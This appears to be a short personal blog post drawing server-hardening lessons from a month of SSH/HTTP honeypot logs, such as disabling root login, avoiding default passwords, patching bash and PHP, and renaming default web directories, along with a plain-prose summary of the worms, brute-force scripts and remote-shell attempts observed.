So… I’ve been running my ssh/http honeypot for almost a month now. While
I’m not really ready to release all my reports to the intar-webs yet,
there are some lessons that are readily apparent. And sadly, these
are the same lessons everyone else has been screaming about for the
last dozen years.
- Don’t allow root to ssh into your server. Make sure your
/etc/ssh/sshd_config has “PermitRootLogin no” set.
- Don’t use stupid passwords. Passwords like “password”,
“admin”, and “123456” and their assorted variations are the
top passwords that ssh brute force attacks try.
- Longer passwords are better than shorter passwords. Well over
95% of the passwords tried are 8 characters or less.
- Don’t keep the default passwords for any software you install.
Looking at Google for the passwords tried shows that many of them
are default passwords for one piece of software or another.
- Don’t keep the default passwords for any hardware (including
routers). They keep trying “admin” accounts with the password
“admin” which was a default for older home routers.
- Patch bash! They keep trying ShellShock attacks against my
honeypot, so they must be suceeding enough of the time to make
it worth their while.
- Patch PHP! The second most common attack is against old PHP
- Don’t install things into their default directories on the
webserver. Most attacks are against default scripts that get
put into the cgi-bin directory. Even renaming cgi-bin to CGI-BIN
and changing your httpd.conf file to reflect that change eliminates
more than 95% of the attacks. Close after that are phpMyAdmin.
webtools, ccbill, cgibin (no dash), and /mail. Rename those
directories and even if you’re vulnerable, they probably won’t
find you quickly.
What are they trying to run?
- Number one thing they are trying to run is the Atrix IRC worm.
This is an IRC bot that lets them attack other servers, AND can
give them the ability to run commands on your server as whatever
UID is running httpd.
- bash. yes, bash. There’s an option in bash to open a network
connection to the outside world. This lets them telnet to whatever
port they decided to use and have a bash shell on your server to
run whatever they want to.
- ssh brute force scripts. These try to login to other servers
and then report the successfull attempts back to another server.
- ONE instance of a rootkit. Why? I have no idea. I assume
the other attacks are precursors to downloading and running a
rootkit on your server.